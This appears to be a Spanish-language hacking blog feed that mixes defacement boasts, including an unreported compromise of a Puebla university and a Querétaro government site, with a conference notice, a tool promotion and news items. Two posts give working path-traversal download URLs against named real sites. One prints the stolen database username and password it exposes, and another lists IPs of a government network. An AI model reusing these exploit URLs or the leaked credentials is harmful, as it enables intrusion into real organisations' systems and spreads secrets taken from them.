Universidad del Valle de Puebla. Owned!

Errores: Uploading shell / SQL injection (por Duff), Admin Logins, PhpAdminLogs reading, Phpmyadmin Access.

Reportado: NO

Gretz: Duff

X.25 Ethical Hacking Conferences

X.25 Ethical Hacking Conferences

Uno de los principales eventos en Latinoamérica relacionado con la seguridad informática.

El “X.25 Ethical Hacking Conferences” permitirá reunir a investigadores reconocidos a nivel nacional y mundial quienes compartirán las nuevas tendencias de la seguridad informática a un nivel totalmente técnico quienes son provenientes de una gran variedad de universidades e instituciones de educación superior, organizaciones comerciales del sector público y privado e investigadores que por su propia cuenta han hecho descubrimientos en cuestión de seguridad informática se refiere.

Este evento se dividirá en dos etapas: los talleres de Especialización enfocados a capacitar en las principales áreas de Seguridad Informática, y el ciclo de Conferencias impartidas por reconocidos expertos que serán invitados a este magno evento para compartir sus últimas investigaciones y experiencias en el área.

Las Conferencias y los talleres de Seguridad Informática se llevarán a cabo del

22 al 23 de Octubre del 2010.
X.25 Ethical Hacking Conferences

Consultas de numeracion y claves de larga distancia.

Bien, esto lo pongo por si a algunos les parten las bolas con las llamadas que en veces hacen y no sabemos quien coño es, o que las mujeres se paniquean y piensan que las van a secuestrar y hacer cositas….o que se yo XD

pero ultimamente me ha preguntado mucha gente que como pueden localizar un numero telefonico para tal circunstancia…

Aqui les dejo esta web:

http://dset01.cft.gob.mx/cgi-bin/pnndev/c_cld

Que lanza los resultados de la ubicacion de donde esta registrado el telefono y a que empresa, y mucha mas informacion….

aqui un screen de lo que veran al abrirlo.:

Ip`s Disponibles de la sep.gob.mx

IP Disponibles
IP
168.255.188.1
168.255.<188.10
168.255.188.100
168.255.188.101
168.255.188.103
168.255.188.104
168.255.188.105
168.255.188.108
168.255.188.109
168.255.188.11
168.255.188.112
168.255.188.113
168.255.188.114
168.255.188.118
168.255.188.119
168.255.188.12
168.255.188.120
168.255.188.123
168.255.188.124
168.255.188.126
168.255.188.127
168.255.188.13
168.255.188.131
168.255.188.133
168.255.188.135
168.255.188.136
168.255.188.137
168.255.188.14
168.255.188.140
168.255.188.143
168.255.188.144
168.255.188.145
168.255.188.147
168.255.188.148
168.255.188.149
168.255.188.15
168.255.188.153
168.255.188.156
168.255.188.157
168.255.188.159
168.255.188.16
168.255.188.169
168.255.188.170
168.255.188.171
168.255.188.172
168.255.188.173
168.255.188.174
168.255.188.175
168.255.188.176
168.255.188.177
168.255.188.178
168.255.188.179
168.255.188.18

www.queretaro.gob.mx Hacked by kl4nx

Aqui un screen.

#Matriux OpenSource de Seguridad en Hacking etico y Testing Web.

El Matriux es un fenómeno que estaba esperando a suceder. Se trata de una distribución completamente ofrecido de seguridad compuesto por un grupo de fuente poderosa, abierta y herramientas gratuitas que pueden utilizarse para diversos fines, incluyendo pero no limitado a, las pruebas de intrusión, hacking ético, sistema y administración de redes, ciber investigaciones forenses, pruebas de seguridad , análisis de vulnerabilidad, y mucho más. Se trata de una distribución diseñada para los entusiastas y profesionales de la seguridad, aunque se puede utilizar normalmente como sistema de escritorio por defecto.

Con Matriux, usted puede convertir cualquier sistema en un poderoso conjunto de herramientas de pruebas de penetración, sin tener que instalar ningún software en los discos duros. Matriux está diseñada para ejecutarse desde un entorno vivo como un CD / DVD o memoria USB o puede ser fácilmente instalado en el disco duro en unos pocos pasos. Matriux también incluye un conjunto de análisis forense informático y herramientas de recuperación de datos que pueden ser utilizados para el análisis forense y de investigación y recuperación de datos.

Pagina Oficial: http://www.matriux.com/
Descarga: http://www.matriux.com/download.html

Arbitrary download – www.anhelodiseno.com.mx

Pagina: http://www.anhelodiseno.com.mx/
Vulnerabilidad: Arbitrary Downloader.
Archivo vulnerable: descargas.php
Explotando: http://www.anhelodiseno.com.mx/hubbell/descargas.php?pdf=../mysql.php




/* variables de conexión */
var $BaseDatos;
var $Servidor;
var $Usuario;
var $Clave;

/* identificador de conexión y consulta */
var $Conexion_ID = 0;
var $Consulta_ID = 0;

/* número de error y texto error */
var $Errno = 0;
var $Error = "";

/* Método Constructor: Cada vez que creemos una variable
de esta clase, se ejecutará esta función */
function DB_mysql($bd = "anhelo01_hubbell", $host = "localhost", $user = "anhelo01_hubbell", $pass = "hubbell4517") {
$this->BaseDatos = $bd;
$this->Servidor = $host;
$this->Usuario = $user;
$this->Clave = $pass;
}


Bug en IFAI.com.mx

Estaba checando y vi que la pagina del ifai.com.mx note que tiene un pequeño bug:

www.informacionpublica.com.mx/descargar.php?r=descargar.php

Tiene la vulnerabilidad de Arbitrary Download.

El archivo que se descarga es el archivo “descargar.php” que contiene lo siguiente:

//Extensiones de archivos que se pueden descargar, esto para evitar la descarga de archivos indebidos
$extensiones = array("pdf", "doc", "docx", "xls", "xlsx", "ppt", "pptx", "mp3","wmv","jpg","zip");
$archivo = isset($_GET['a'])?$_GET['a']:"";
$ruta = $_GET['r'];
if(isset($_GET['a']) && $_GET['a'] != ""){
$ftmp = explode(".",$archivo);
$fExt = strtolower($ftmp[count($ftmp)-1]);

if(!in_array($fExt,$extensiones)){
return ;
}
}
header("Content-type: application/octet-stream");
header("Content-Disposition: attachment; filename=\"$archivo\"\n");
$fp = fopen($_SERVER['DOCUMENT_ROOT'].$ruta.$archivo, "r");
fpassthru($fp);
fclose($fp);

El error ya fue reportado este dia sabado 21 de Nov. 09

Saludos!

Investigan Fraude Bancario Leon Gto.

REDACCIÓN
NOTA PUBLICADA: 11/21/2009 – Periodico a.m. http://www.am.com.mx

El Ministerio Público federal inició la averiguación previa 9103/2009 en contra de José de Jesús Villegas González y José Oliverio Company Pérez por el violación a la Ley de Instituciones Bancarias.

Los jóvenes de 21 y 20 años de edad, respectivamente, son sospechosos de realizar transacciones electrónicas bancarias sin la autorización del titular de la cuenta.

El jueves José de Jesús y José Oliverio fueron detenidos en la sucursal Centro de Bancomer cuando pretendían recoger dinero que supuestos clientes habían depositado a la cuenta de una mujer con engaños.

Al parecer la víctima estuvo recibiendo varios depósitos “extraños” que supuestamente fueron robados de las cuentas de otros clientes a través de transacciones por ‘hackers’ en internet.

El día de la detención la mujer aún tenía en sus cuentas tres depósitos; uno por 89 mil pesos y otros dos por 24 mil pesos, de los que aseguró desconocer su procedencia.

Con base en el informe oficial, los responsables del engaño, quienes eran clientes de la mujer, le solicitaron que abriera cuatro cuentas bancarias.

MacTini, La computadora mas pequeña del mercado.

Bueno brothers entre una platica con un brodi diseñador salio la platica de las nuevas tecnologias que hay en este mudno. Todo lo nuvo que sale y salio esto que quisiera presentarles.

esta gran maquina que pues a decir verdad supera a cualquier aspire one o a las hp 1100 y cualquier personal….quizas tambien ya supere a las palm, y a los moviles que usualmente usamos.

Chequen este vide:

! LOOOOOL !